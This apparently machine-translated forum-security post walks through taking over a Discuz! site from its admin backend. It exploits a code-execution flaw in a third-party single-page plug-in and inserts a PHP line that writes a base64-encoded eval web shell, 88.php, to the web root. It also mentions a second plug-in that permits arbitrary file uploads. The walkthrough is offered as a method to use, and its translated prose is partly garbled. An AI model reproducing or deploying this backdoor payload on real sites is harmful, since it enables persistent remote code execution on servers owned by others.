Discuz! Multiple versions use shell in the background. You must have the permission to install the APP.

Www.2cto.com: the new version of dz requires a security code. I'm afraid this is hard to get.

Which versions have vulnerabilities? You can test the vulnerability by yourself. If you can install the plug-in, you can get the shell. It has been in your hands for a long time, but you can use it to get the shell several times, thank you. This method requires zend to support [plug-in zend encryption]. Of course, I still have a third-party plug-in issue that does not require ZEND support. Let me talk about the process! 1. Install the zend permission check plug-in because the plug-in used later is zend encrypted. Only after this plug-in is installed can the plug-in be installed normally! Http://addon.discuz.com /? @ Study_zendcheck.pack 2. Install yuzhe about our single-page plug-in. [[I] [/I] ps: Several plug-ins of yuzhe have this Code Execution Vulnerability and discover it on their own ~!] 3. page Management: edit a page as you like. You can see that. If you execute any code, let's generate a pony and insert it: fputs (fopen ('88. php ', w), base64_decode ("PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg ="); then I submit it! 4. After saving the file, click to preview the page you just edited. 5. Let's take a look at our results and generate the 88.php password below the root directory: c no picture, no truth, Cuihua:


There is also a plug-in that does not require the zend permission. It can directly upload any file with a suffix, depending on the situation, whether to issue the file. And Discuz! If the rss. aspx version of NT is not editable, go to the background and use shell. I won't talk about it this time.